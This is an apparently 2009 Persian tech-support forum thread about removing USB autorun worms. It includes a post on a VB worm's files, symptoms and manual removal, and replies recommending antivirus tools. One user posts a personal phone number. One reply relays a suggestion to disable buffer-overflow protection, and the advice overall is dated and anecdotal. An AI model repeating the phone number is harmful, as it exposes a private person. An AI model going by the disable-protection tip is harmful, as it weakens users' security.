[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]





تا فایل دومی به نام comment.htt یا Runcomment.htt را بعد از هر بار ورود به پوشه یا درایور هارد اجرا کند . در این فایل هم کدهای زیر قرار دارد :





[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]





که فایل اجرایی موجود در پوشه را اجرا می کند .

همچنین کرم فایلی به نام WINFILE.EXE را در تمایم درایو های هارد و بعضی پوشه های می سازد . همچنین در درایو فلاپی . این فایل شبیه پوشه است .





علائم آلودگی :

1) وجود فایل در درایو های هارد
2) کپی شدن خود کار این فایل در فلاپی درایو
3) اگر فایلهای مخفی را ظاهر کنید . دو باره بعد از مدتی مخفی می شوند .
4) هنگام رفتتن به هر پوشه فایلی اجرای به شکل پوشه و با همان نام در آنجا ساخته می شود (البته مخفی ) .
5) در ویندوز های 98 تا 2000 ویندوز بعد از مدتی کند می شود .
6) بعضی مواقع کپی و پست کار نمی کند . یعنی شما فایل را کپی می کنید . اما بعد از رفتن به مقصد گزینه پست غیر فعال شده است انگار کپی انجام نگرفته !





نکته 1 :ویروس به زبان VB نوشته شده توسط مایکروسافت ویژوال استودیو .

نکته 2 : احتمالا نام دیگر ویروس Xgtray
نکته 3 : اگر هنگامی که فایل اصلی کرم در یکی از پوشه های Windows ، Temp ، System ، Web ، Help باشد و شما وارد پوشه ای شوید که کرم در آن است آن وقت کرم جای حود را عوض می کند و به پوشه ی دیگری می رود !





طریقه پاک کردن ویروس :

تمامی آنتی ویروس ها دیگر این ویروس را می شناسند .
اما پاک کردن دستی به این صورت است .
1) ابتدا فایل اجرایی ویروس را از کار می اندازید . ( فایلی که در حافظه است ) با Taskmanenger
2) با سرچ ویندوز دنبال فایلهای اجرایی با حجم 48 کیلو بایت می گردید . بعد آنهایی را که شکل پوشه هستند را پاک می کنید .
3) دو باره باسرچ ویندوز دنبال فایلهایی با پسوند htt و با نام های comment و Runcomment میگردید . همه را پاک کنید .
اما بهترین کار استفاده از یک آنتی ویروس است . بهتر است از مکافی ورژن 8 به بالا استفاده کنید
این ویرس ممکن است کارهای دیگری هم انجام دهد
منبع : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])










موفق باشید .


مهدی ( mahdi7610 )









آموزشی که مهدی جان PDF کردن در سرور p30 آپلود شد




سلام اقا مهدی من هرکاری میکنم که ویروس show hidden files رو پاک کنم نمیتونم چون هروقت تیک کناره show hidden files and folders و میزنم بهد apply و بعد ok میکنم فایل های مخفی را نشان نمیدهد در ضمن همه ی برنامه ها و ترفند هایی که نوشتید را انجام دادم ولی کار نکردند در ضمن یک مشکل دیگه من وقتی بعضی از سی دی ها را درون سی دی رام میگذارم بالا نمی ایند و در داخل سایز سی دی می نویسد 0 بایت ولی خط رایت روی سی دی افتاده است
اگر من را راهنمایی کنید ممنون میشم این هم شماره من ممکن است هفته ای یک بار روی خط بیام
:11:09367558427
متشکرم

mahdi7610
10-04-2009, 16:18
سلام اقا مهدی من هرکاری میکنم که ویروس show hidden files رو پاک کنم نمیتونم چون هروقت تیک کناره show hidden files and folders و میزنم بهد apply و بعد ok میکنم فایل های مخفی را نشان نمیدهد در ضمن همه ی برنامه ها و ترفند هایی که نوشتید را انجام دادم ولی کار نکردند در ضمن یک مشکل دیگه من وقتی بعضی از سی دی ها را درون سی دی رام میگذارم بالا نمی ایند و در داخل سایز سی دی می نویسد 0 بایت ولی خط رایت روی سی دی افتاده است
اگر من را راهنمایی کنید ممنون میشم این هم شماره من ممکن است هفته ای یک بار روی خط بیام
:11:09367558427
متشکرم

سلام

برای حل مشکل show hidden files قبل از انجام مراحلی که گفته ام باید حتما انتی ویروس بیدیفندر را روی سیستم خودتون نصب کنید و سیستم را کامل در حالت safe mode ویروس یابی کنید .

حتما باید اخرین نسخه از این انتی ویروس را روی سیستم نصب کنید . و اونا صد در صد اپدیت کنید . و شروع به اسکن سیستم در حالت سیف مود کنید .
بعد از این کار اگه مشکل حل نشد که احتمالا حل بشه روشهای گفته شده را انجام دهید .

در مورد مشکل سی دی ها هم مطمئن بشید که سی دی رام یا دیوایسی که با اون سی دی ها را نگاه میکنید سالم هستند . و از صحت و سالم بودن ویندوزتون هم مطمئن باشید .

موفق باشید :)

asemonee
11-04-2009, 02:26
سلام . لپ تاپ من چند روزی شکل پیدا کرده و حتی با ریکاوری خود لپ تاپ هم درست نمیشه. نمیدونم که مشکل از ویروس یا نه. من این پستو خوندم هیچکدوم از این علائم رو نداره ولی عد از 3-4 بار ریست کردن روشن میشه حرف م یا تایپ نیشه یا خود به خود بینهایت تایپ یشه البته من اینجا مجبور شدم همه م هارو کپی کنم. وقتی که روشن میکنم شروع به بوق زدن ممتد میکنه و تا اینتر رو نزنم بالا نمیاد. گاهی هم خود به خود روی فایلها پرش یکنه و انتخاب یشه . البته انتی ویروس نود 32 داشتم ولی هیچ اخطاری نداد. حالا که کسپراسکی نصب کرد 20 تا ویروس شناسایی کرده ولی شکل سرجاشه. اگه میشه راهنمایی کید.

saeedica
12-04-2009, 02:09
شرمنده كه اين قدر مزاحمتون شدم آقا mahdi761

شاید مشکلم حل نشد ولی آموزشاتتون حرف نداره

[ali]
13-04-2009, 19:39
New Folder killer


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

urc
13-04-2009, 20:04
انتی ویروس اویرا antivirنصب کن و اپدیتش کن انشاا... مشکلت حل میشه

urc
13-04-2009, 20:08
موقعی که تو می نویسی ویروس autoranگرفتم خوب خودت بگو من چه جوابی بدم
در ضمن تازه اسم ویروس را نوشتی

چه توقعی داری!!!!!!

ks.s
14-04-2009, 09:47
باسلام
من یه سیستم شبکه رو در اختیار دارم رو سیستم من انتی ویروس مکافی نصبه که اخرین آبدیتش رو هم گرفتم یه مدتیه که آنتی ویروس پیغام BO:Writable BO:Stack رو می ده البته در قسمت status حالت blocked میآد چه جوری می شه از شرش راحت بشم

ks.s
15-04-2009, 12:43
یکی جواب منو بده

picher_s
15-04-2009, 13:23
باسلام
من یه سیستم شبکه رو در اختیار دارم رو سیستم من انتی ویروس مکافی نصبه که اخرین آبدیتش رو هم گرفتم یه مدتیه که آنتی ویروس پیغام BO:Writable BO:Stack رو می ده البته در قسمت status حالت blocked میآد چه جوری می شه از شرش راحت بشم

سلام
پیغامت اینه:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
من اصلان با Mcaffee کار نکردم اما سرچی که برات زدم ایناست:
Buffer overflow protection prevents exploited applications from executing arbitrary code on your computer."
یه جا هم گفته بود buffer overflow option رو disable کن.
یه جا نوشته بود service pack3 بنصب!
اینو بتست ببین مشکلت حل میشه:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
اینم بتست بعد پیغاماش رو بزار

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
طریقه کار کردنش رو هم در Sality نوشتم.
دوست دارم بهت کمک کنم اما ...
موفق باشید.

ks.s
16-04-2009, 08:30
باسلام
ممنون از اینکه به فکر کمک به من بودید ولی هیچ کدوم از اینا تاثیری نداشت اگه چیزی پیدا کردم خبرتون می کنم

hamedchtsz
16-04-2009, 22:48
با سلام.
سیستم دوست من به ویروسی مبتلا شده که:
1-دو پروسه smss.exe و lsass.exe در task manager ایجاد کرده و در حالت safe mode هم قابل توقف (End Proccess) نیستند.
2-در قسمت فولدر آپشن گزینه Do not Show Hidden File & Folders انتخاب شده و تیک گزینه Hide extensions for known file types برداشته شده و این دو مورد قابل تغییر نیستند یعنی نمی توان گزینه show hidden file & folders را انتخاب کرد و نه می توان گزینه Hide extensions for known file را تیک دار کرد.
3-دو پوشه عکس که از حافظه دوربین دیجیتال روی هارد کپی شده با اینکه حجم آنها تغییری نکرده و مشخصا محتوی عکس های مورد نظر هستند اما وقتی آنها را باز می کنم چیزی در آنها نشان داده نمی شود. احتمالا به صورت hidden در آمده اند.

راهنمایی های موجود در پست اول تاپیک به من کمک نکرد و با تعویض ویندوز ویروس از بین نرفت. لطفا مرا راهنمایی کنید.
ضمنا ویروس از طریق فلش مموری آلوده به سیستم منتقل شده
با سپاس فراوان.

hlhhlhyan
17-04-2009, 11:47
سلام سیستمم چند وقته فکر کنم ویروس گرفته فایل های مخفیم وقتی میخام از حالت مخفی دریارم نمایان نمیشه نود32هم ویروسی ÷یدا نکرد چیکارکنم فایل هام خیلی مهمن دیوانه شدم ای خدااااااا

omid-p30
17-04-2009, 12:33
سلام سیستمم چند وقته فکر کنم ویروس گرفته فایل های مخفیم وقتی میخام از حالت مخفی دریارم نمایان نمیشه نود32هم ویروسی ÷یدا نکرد چیکارکنم فایل هام خیلی مهمن دیوانه شدم ای خدااااااا

پست اول رو بخونید

hlhhlhyan
17-04-2009, 13:28
پست اول رو خوندم ولی افاقه نکرد.اون atoturanهستش ولی با هیچ را حلی پاک نمیشه دیوانه شدم الان 3یا4ماهه کامپیوترم همین وظعیتو داره 3بارم ویندوزمو عوض کردم بی فایدس آقا امید اون راه حلا شاید قدیمی شدن دیدم نوشته ها مال 2008ولی الان 2009هستیم کلی ویروسا جدید شدن به والله دیوانه شدم کلی فایل مخفی دارم که اساسی لازم دارم آخه به کی بگم ای خدااااااااااا

caspian
17-04-2009, 17:04
من روی هر درایوی که میرم این ارور میاد
this file does not have a program associated with it for performing this action
create an association in the folder option control panel
با چه کار کنم؟

laleh1380
18-04-2009, 00:14
من روی هر درایوی که میرم این ارور میاد
this file does not have a program associated with it for performing this action
create an association in the folder option control panel
با چه کار کنم؟
سلام

دوست عزیز سیستم شما ویروسی شده و من خودم با Kaspersky Internet Security 2009 این مشکل را روی کامپیوتر دوستم حل کردم.

picher_s
18-04-2009, 09:57
با سلام.
سیستم دوست من به ویروسی مبتلا شده که:
1-دو پروسه smss.exe و lsass.exe در task manager ایجاد کرده و در حالت safe mode هم قابل توقف (End Proccess) نیستند.
2-در قسمت فولدر آپشن گزینه Do not Show Hidden File & Folders انتخاب شده و تیک گزینه Hide extensions for known file types برداشته شده و این دو مورد قابل تغییر نیستند یعنی نمی توان گزینه show hidden file & folders را انتخاب کرد و نه می توان گزینه Hide extensions for known file را تیک دار کرد.
3-دو پوشه عکس که از حافظه دوربین دیجیتال روی هارد کپی شده با اینکه حجم آنها تغییری نکرده و مشخصا محتوی عکس های مورد نظر هستند اما وقتی آنها را باز می کنم چیزی در آنها نشان داده نمی شود. احتمالا به صورت hidden در آمده اند.

راهنمایی های موجود در پست اول تاپیک به من کمک نکرد و با تعویض ویندوز ویروس از بین نرفت. لطفا مرا راهنمایی کنید.
ضمنا ویروس از طریق فلش مموری آلوده به سیستم منتقل شده
با سپاس فراوان.
سلام
رفیق اون فایلهای رو که گفتی ویروس نیستند.
میتونی آنتی بنصبی؟ اگه میتونی یه Avira بنصب بعد دوباره بیا.

مال 2008ولی الان 2009هستیم کلی ویروسا جدید شدن
ببین رفیق مهم اینه که هنوز اون ویروسها زنده اند و روشهای الگوریتمیک و برنامه های کمکی که گفتن جواب میده.
شما هم اگه میتونی Avira رو بنصب.
موفق باشید.

moji643
21-04-2009, 11:48
سلام دوستان

من یک مشکلی داشتم اگه کمکم کنید خیلی ممنون میشم.

چند روز پیش از طریق یک فلش همان ویروس اتوران به سیستمم وارد شد که خیلی
اعصابمو خورد کرد بعد ویندوزم رو عوض کردم که شاید از شرش خلاص بشم ولی
بعد از عوض کردن دیدم باز هم وجود داره. الان میخوام هاردم رو فرمت کنم.
حالا دو تا سوال داشتم :

1- آیا بعد از این کار باز هم احتمال داره که این ویروس روی سیستمم قرار بگیره؟

2- من کل دیتایی که رو سیستمم بود رو ریختم روی دی وی دی. که متاسفانه بعد از رایت کردن
دیدم فایل هایی با نام اتوران و یا thumbs روی دی وی دی ها قرار گرفته. آیا بعد از اینکه
مثلا بخوام فایلی رو از روی دی وی دی بردارم اون ویروس ها به سیستمم وارد میشن؟


در زیر هم عکسی از همان وضعیت برایتان میگذارم.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



اگر امکان داره خیلی زود جوابم رو بدین چون میخوام تا حداکثر دو ساعت دیگه فرمت کنم.

تشکر از شما.
موفق باشید

mojtaba_tanha
21-04-2009, 13:29
دوستاني كه مشكل FOLDER OPTION دارند اين فايلم امتحان كنند شايد جواب بده. فقط بعد از اجرا فايل سيستم و رست كنيد.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

sireagle
21-04-2009, 15:15
سلام
یه ویروسی گرفتم که task manager و kaspersky رو غیر فعال کرده.الان با کمک پست اول task manager رو فعال کردم اما کسپر ام جرا نمیشه هنوز.دوباره هم نصب نمیشه
چی کار کنم؟

omid-p30
21-04-2009, 15:39
سلام
یه ویروسی گرفتم که task manager و kaspersky رو غیر فعال کرده.الان با کمک پست اول task manager رو فعال کردم اما کسپر ام جرا نمیشه هنوز.دوباره هم نصب نمیشه
چی کار کنم؟

کاسپر رو پاک کنید.برنامه Malwarebytes Anti-Malware رو نصب و آپدیت کنید و سیتم رو باهاش کامل اسکن کنید تا ویروس ها رو از بین ببره بعد کاسپر رو نصب کنید.

sireagle
21-04-2009, 16:00
ممنون
نمیشه وقتی کسپر هست نصبش کنم؟

omid-p30
21-04-2009, 16:22
ممنون
نمیشه وقتی کسپر هست نصبش کنم؟

میشه. فقط گفتم چون ممکنه قاطی کرده باشه یک بار پاک بشه و دوباره نصب بشه.

frbmjb
22-04-2009, 01:23
سلام
سیستم من به ویروسی آلوده شده که پوشه برنامه هایی که محتوی فایل EXE هستند و در هارد usb می باشند زمانی که نشانگر ماوس روی آنها است folder is empty را نشان می دهد و در هنگام کلیک کردن پیغام.is not accessible......... access is denied
را می دهد و فایل را نمی توان بازو یا کپی کرد و اگر در برنامه نرو باز کنیم شکل فایل exe تغییر کرده و اجرا نمی شود

::::::: مشکل باز شدن پوشه را می توان حل کرد ولی همچنان شکل فایل exe بصورت dos می باشد و اجرا نمی شود:::::::::
با تشکر فراوارن

moji643
22-04-2009, 13:39
کسی جواب ما رو نمیده؟!!! ( آخرین کامنت در صفحه ی قبل. )

تشکر

mojtaba182003
22-04-2009, 18:43
سیستمم یه ویروس جدید گرفته آنتی ویروسمم که نود 32 هست میشناستش توی فلاشم آنتی ویروس پاکش میکنه اما پشت سر هم میسازه دوبار

نام فولدرش هست Driver توی فولدرشم یه شکل سطل زبالس اسمشو یادم نیست اما اسم ویروسی که نود توی اسن فولدر پیدا میکنه Zex البته اگه اشتباه نکنم

کسی میدونه مشکلم چه جوری حل میشه ؟

picher_s
23-04-2009, 08:59
چند روز پیش از طریق یک فلش همان ویروس اتوران به سیستمم وارد شد که خیلی
اعصابمو خورد کرد بعد ویندوزم رو عوض کردم که شاید از شرش خلاص بشم ولی
بعد از عوض کردن دیدم باز هم وجود داره. الان میخوام هاردم رو فرمت کنم.
حالا دو تا سوال داشتم :

2- من کل دیتایی که رو سیستمم بود رو ریختم روی دی وی دی. که متاسفانه بعد از رایت کردن
دیدم فایل هایی با نام اتوران و یا thumbs روی دی وی دی ها قرار گرفته. آیا بعد از اینکه
مثلا بخوام فایلی رو از روی دی وی دی بردارم اون ویروس ها به سیستمم وارد میشن؟



اگر امکان داره خیلی زود جوابم رو بدین چون میخوام تا حداکثر دو ساعت دیگه فرمت کنم.

تشکر از شما.
موفق باشید


1- آیا بعد از این کار باز هم احتمال داره که این ویروس روی سیستمم قرار بگیره؟
همیشه احتماله گرفتن ویروس وجود داره:31: پس شما از یه Internet Security توپ استفاده کن.


الان میخوام هاردم رو فرمت کنم.
پیشناهاد میدم فرمت نکنی.

مگه نمیتونی آنتی بنصبی؟


- من کل دیتایی که رو سیستمم بود رو ریختم روی دی وی دی. که متاسفانه بعد از رایت کردن
دیدم فایل هایی با نام اتوران و یا thumbs روی دی وی دی ها قرار گرفته. آیا بعد از اینکه
مثلا بخوام فایلی رو از روی دی وی دی بردارم اون ویروس ها به سیستمم وارد میشن؟


عزیز رو هاردت کپیش کن بعد با آنتی جستجوش کن بعد دیگه هر کار دوست داری.
موفق باشید.

mojtaba182003
23-04-2009, 09:14
نام ويروس Zerx هستش

كسي نميدونه چجوري ميشه كامل از بين بردش ؟؟؟

wood56
23-04-2009, 09:15
با سلام
وقتی که فلش را به سیستم وصل می کنم اخطار زیر مشاهده می شود.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

هنگامیکه با Nod32 که آپدیت هم هست آن را اسکن می کنم چیزی نمی یابد. با اینکه فلش را Format کردم اما باز هم هنگامیکه آن را به سیستم وصل می کنم پیغام اخطار فوق مشاهده می شود.
و حجم تقریباً معادل 6MB مشاهده می شود و همانطوریکه در شکل زیر مشاهده می شود محتویات داخل آن به صورت سه فولدر مشاهده می شود.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
لطفاً مرا راهنمایی کنید که چگونه می توانم این مشکل را برطرف کنم؟ چرا با اینکه فلش را فرمت میکنم اما هنوز این پوشه ها در آن مشاهده می شود؟ آیا مشکل از سیستم من می باشد؟
با تشکر

Alireza.M67
23-04-2009, 14:51
من هر کاری که گفته بودید کردم ولی هنوزم وقتی رو درایو ها دابل کلیک می کنم تو یه صفحه جدید باز میشن و هنوزم فایل های هیدن نشون داده نمیشن ...
چه کنم ؟

Alireza.M67
23-04-2009, 18:23
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
آقا میشه این فایلو یه بار دیگه آپ کنی ؟
این دانلود نمیشه

moji643
24-04-2009, 17:30
سلام دوست عزیز

تشکر از شما


همیشه احتماله گرفتن ویروس وجود داره:31: پس شما از یه internet security توپ استفاده کن.


منظورم این بود که اگر فرمت کنم آیا این امکان داره که باز هم (( بدون اینکه ویروس از

جایی غیر از درون خود سیستم وارد بشه )) ، ویروسی وارد سیستم بشه؟!



پیشناهاد میدم فرمت نکنی.



آخه میدونید وقتی که ویندوزم رو عوض کردم باز هم همان ویروس ها توی سیستمم بود!!!!



مگه نمیتونی آنتی بنصبی؟


چرا میتونم. موقعی که ویندوز رو عوض کردم ورژن قدیمی کسپر رو نصب کردم. موقعی هم

که واسه ویروس سرچ میکردم همان وضعیتی که عکسش رو در صفحه ی قبل گذاشته بودم، برای

سیستمم اتفاق افتاد. یعنی کسپر فولدرهایی که در صفحه ی قبل هیدن شده بودن رو پاک کرده

بود ( اولش که این اتفاق افتاد دیدم که نزدیک 20 گیگ از دیتاهای روی سیستم رو دیلیت کرده خیلی

حالم گرفته شد ). همین کار رو هم با nod32 انجام دادم باز هم ناد32 همین تشخیص

رو داد و آنها رو دیلیت کرد. وقتی هم خواستم کسپر 8 رو بنصبم ویروس نمیذاشت!!




عزیز رو هاردت کپیش کن بعد با آنتی جستجوش کن بعد دیگه هر کار دوست داری.

بعد که با همان کسپر قدیمی که سیستم رو داشتم سرچ میکردم فولدرهایی که ویروس تشخیص میداد رو add to trusted zone میکردم.


باز هم تشکر از شما عزیز جان.
موفق باشید

Mohsen P
25-04-2009, 00:45
من سیستمم ویروسی شده بود که با NOD 4.0.42 پاکش کردم اما وقتی می خوام درایو ها رو باز کنم ،درایو توی یه پنجره جدید باز می شه، در ضمن توی درایو ها دو تا فایل ساخته شده autorun.inf و ej10fkdo.bat که من هر چی توی محیط nero پاکشون می کنم ،پاک نمیشه (این فایل ها hide هستن و همچنین ُShow Hide file & folder توی قسمت Folder Option غیر فعال شده.
چه جوری باید این مشکل رو حل کنم.
مرســــــــــــــی!

civilman
26-04-2009, 15:05
مشکلی که وجود داره اینه که یک فایل چند گیگی توی درایو C ایجاد میشه و بعد از یک مدت که ری استارت میکنم ویندوز میپره و پاک میشه
شما میتونید راهنمایی کنید؟
nod هم نمیشناسه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

urc
26-04-2009, 15:16
مشكلت با Avk اپديت شده حل ميشه

civilman
26-04-2009, 15:41
مشكلت با avk اپديت شده حل ميشه

میشه لینک دانلود را هم بدهید؟

am
26-04-2009, 19:47
مشکلی که وجود داره اینه که یک فایل چند گیگی توی درایو c ایجاد میشه و بعد از یک مدت که ری استارت میکنم ویندوز میپره و پاک میشه
شما میتونید راهنمایی کنید؟
nod هم نمیشناسه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

این فایل مخصوص ذخیره اطلاعات در هنگام هیبرنیت کردن سیستم میباشد
این فایل ویروس نیست

civilman
27-04-2009, 02:18
این فایل مخصوص ذخیره اطلاعات در هنگام هیبرنیت کردن سیستم میباشد
این فایل ویروس نیست

آره ممنونم مشکل را با تنظیمات حل کردم

Mokafating
27-04-2009, 03:25
سلام من یه سوال دارم که ربطی به موضوع تاپیک نداره میخواستم بدونم این عکسهایی که از قسمتهای مختلف کامپیوتر میزارید چطور ازش عکس میگیرید با تشکر

urc
27-04-2009, 10:06
avk انتی ویروسی است که به طور همزمان از فناوری nod 32و kaspersky استفاده میکند و تنها مشکل ان این است که باید برای اپدیت ان هزینه اش را متقبل بشوی اگر می خوای بگو تا لینک دانلودش را هم برات بگذارمفقط بهت بگم بدونه اپدیت ازnod32 هم ضعیف تره حدودا 51 مگابایته فایل اپدیتش هم 20 مگابایت و 10 مگابایته در کل اگه adsl داری بگو تا لینک دانلودش رو برات بذارم

civilman
27-04-2009, 12:58
avk انتی ویروسی است که به طور همزمان از فناوری nod 32و kaspersky استفاده میکند و تنها مشکل ان این است که باید برای اپدیت ان هزینه اش را متقبل بشوی اگر می خوای بگو تا لینک دانلودش را هم برات بگذارمفقط بهت بگم بدونه اپدیت ازnod32 هم ضعیف تره حدودا 51 مگابایته فایل اپدیتش هم 20 مگابایت و 10 مگابایته در کل اگه adsl داری بگو تا لینک دانلودش رو برات بذارم

مرسی
اگر داری بزار البته اگر با آپدیت جدید داری من مشکلم اینه که یک ویروسی گرفتم که تقریبا روزی یک بار باید ویندوز نصب کنم و ویندوزم میپره
حلا دوستمون گفت راه حلش این آنتی ویروسه
من خودم nod استفاده میکنم و راضیم اما ورژن 4 را دانلود کردم آپدیت هم کردم ولی پیدا نکرد
دارم دیوونه میشم

civilman
27-04-2009, 13:03
سلام من یه سوال دارم که ربطی به موضوع تاپیک نداره میخواستم بدونم این عکسهایی که از قسمتهای مختلف کامپیوتر میزارید چطور ازش عکس میگیرید با تشکر
روی صفحه کلید دکمه print screen یا prtsc را فشار بدید حالا نرم افزاری مثل paint را باز کنید و از منوی editeگزینه paste بعدشم هر قسمتی را که خواستید کات کنید و ذخیره کنید

urc
27-04-2009, 20:29
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

m2khan
27-04-2009, 21:00
g1ljsm.com
این ویروسو کسی دیده من گرفتمش ولی خیلی نامرده

تو win32 یک dll می سازه
تو My Documents تو ی Temp یک یک فایل می سازه

تو ریستور هم می سازه

تو سطل آشغال یک بک آپ میزاره که بعد از ری استارت بازم میاد بالا
تازه تئ windos یک exe می سازه که خدایی شانسی پیداش کردماگه اطلاعات و راه پاک کردنشو میدونید توضیح بدین

Mokafating
28-04-2009, 02:54
روی صفحه کلید دکمه print screen یا prtsc را فشار بدید حالا نرم افزاری مثل paint را باز کنید و از منوی editeگزینه paste بعدشم هر قسمتی را که خواستید کات کنید و ذخیره کنید

خیلی ممنون دوست عزیز :11:

naseh
29-04-2009, 18:16
دوستان سلام سیستم من الوده شده ولی نمی دانم چه نوع ویروسیه دو تا انتی ویروس نصب کردم ولی تشخیص نمیده مشکل اساسی که دارم ویروس نمی زاره به اینترنت وصل بشم یعنی کانکت میشه ولی هیچ سند ورسیو نداره میشه کمکم کنید

urc
29-04-2009, 18:59
2009 avk را دانلود کنید

urc
29-04-2009, 19:01
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



دانلودavk

urc
29-04-2009, 19:04
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

urc
30-04-2009, 19:26
هیچکس aVKرا دانلود نکرد


در ضمن 271 مگابایته

V E S T A
01-05-2009, 13:38
سلام

بچه ها کامپیوتر من ویروسی شده task manger-registry غیر فعال شدن..fire fox و pdf هارو هم نمیتونم باز کنم


البته من مشکلمو اینجا گفتم


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بچه ها بهم کمک کردن...و رجیستری و تسک منیجر الان فعالن...ولی الان من نمیتونم کامپیوترو shut down کنم...

فقط با سیف من شات دان میشه...

موقع ریکاوری هم واسه همه چی can not repair میزنه!

لطفا بهم بگین چیکار کنم...:41:

urc
01-05-2009, 15:36
:40::2:
در ابتدا از طريق منوي Start وارد Run شويد و بعد در آن تايپ كنيد systemroot%\inf% ( بدون هيچ فاصله اي ) و Ok را بزنيد. با اين كار پوشه فايلهاي Inf سيستم شما باز ميشود.
حالا به دنبال فايلي با نام mstask.inf بگرديد ( بدون پسوند Inf ). بعد از يافتن آن را Highlight كرده و رويش راست كليك كنيد.
حالا از منوي ظاهر شده عبارت Install را انتخاب كنيد ( رويش كليك كنيد ).
در اين مرحله شما بايد CD ويندوز XP خود را درون درايو قرار داده تا مراحل نصب كامل شود.
بعد از نصب كامل ، با يك بار Restart سيستم Task Manager شما بدون هيچ گونه مشكلي باز خواهد گشت.
بعد از اينكار حتما به فكر ازبين بردن فايل Server برنامه هك كه در سيستم شما نصب شده ( اگر هك شده ايد ) باشيد تا ديگر چنين مشكلاتي برايتان پيش نيايد و در ضمن استفاده از يك Firewall قوي نيز ميتواند كمك شاياني به شما كند.

urc
01-05-2009, 15:37
در ضمن مشکل منم نیست کهcdویندوز نداری

urc
01-05-2009, 15:47
راه حل های خاموش کردن هم بعدا میگم

V E S T A
01-05-2009, 16:02
ممنون urc جان

مشکل تسک منیجرم حل شده بود...الان تنها مشکلم اینه که نمیتونم کامپیوترو شات دان کنم...فقط با سیف

مد میشه شات دان کرد...بعد از شات دان یا ری استارت یه صفحه آبی باز میشه یه چیزایی نوشته میشه...

بعد ری استارت میشه..

سی دی ویندوزم گیر اوردم...:46:

:11:

urc
01-05-2009, 16:06
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

wordship
01-05-2009, 18:35
انتی ویروس prevexکمک شایانی برای ویروس های ناشناخته میند

@z@m
04-05-2009, 15:13
من nod روآپدیت کردم.ویروس autorun روپیدا می کنه ولی پاک نمی کنه.سیستم من به ویروس harf هم آلودست.باروش دستی هم اجازه پاک کردن xcode رو نمیده.البته من 2 ویندوز ویستا و xp رو زو سیستمم نصب کردم.چطور پاکش کنم؟

علی ایمان
04-05-2009, 18:06
از برنامه های مفید شما متشکر هستم

hilias
05-05-2009, 00:15
سلام دوستان من با یک مشکل عجیب بر خورد کردم اونم اینه که من یک فلش دارم توش پر اطلاعت بود زدم به یک کامپیوتر پاک پاک به اون کامپیوتر هم برای این مطمئن هستم چون تازه اسمبل شده بود . اون فلش رو زدم به نوت بوکم دیگه هیچ فایلی رو ندیدم . حجم فلش نشون میده فایلها توش هست ولی فایلها و فلدر های رو نشون نمیده تمام راه هایی هم که شما گفتید رو برای این مورد رفتم شاید با 10 کامپیوتر چک کردن با هر آنتی ویروسی که میشناختم اسکن کردم که همشون هم آپدیت بودن من الان اطلاعات اون فلش و احتیاج دارم باید چه خاکی بر سرم بریزم .:19: :18: :13: در ضمن شرمنده اگر قبلا توضیح دادید من نتونستم همه 140 صفحه رو بخونم .

wordship
05-05-2009, 15:15
بازم دلم گرقته
ـــــــــــــــــــــــــ ـــــــــــــــــــــ
بازم دلم گرفته
گریم اختیاری نیست
گریم اختیاری نیست
آخه جز گریه منو کاری نیست
یه عمره از محبت
بی نصیبم ای خدا
من غریبم ای خدا
چرا جز غصه منو یاری نیست
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه
از لبهای سردم خنده گریزونه
راز دل خستم هیچکی نمی دونه
بازیچه شدن تا کی
دل رو گول زدن تا کی
افسردگی تا کی
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه
دل به هر که دادم
بی وفایی دیدم
چه رنجایی که عمری از عشق کشیدم
دل به هر که دادم
بی وفایی دیدم
چه رنجایی که عمری از عشق کشیدم
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه
بازم دلم گرفته
گریم اختیاری نیست
گریم اختیاری نیست
یه عمره از محبت
بی نصیبم ای خدا
من غریبم ای خدا
چرا جز غصه منو یاری نیست
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه
اگه عشق همینه
اگه زندگی اینه
نمیخوام چشمام دنیا رو ببینه

Dr.Dolfin
06-05-2009, 15:36
سلام.تمام این اینترنت رو زیرو رو کردم همه آموزش ها رو خوندم اما نتونستم این ویروسی که تسک منیجر رو از کار میندازه رو از بین ببرم.خواهش میکنم یکی بگه من چه کار کنم تا این ویروس پاک بشه؟

strong120
06-05-2009, 16:35
دوستان بنده taske manager غیرفعال شده لطفا کمک کنید.هیچ یک از فایلهایم مخی نیست .فقط taske manager غیر فعال شده .با نرم افزارRRT فعال میشه ولی دوباره به حال قبل برمیگردد متشکرم راهنمائی کنید

wordship
07-05-2009, 15:35
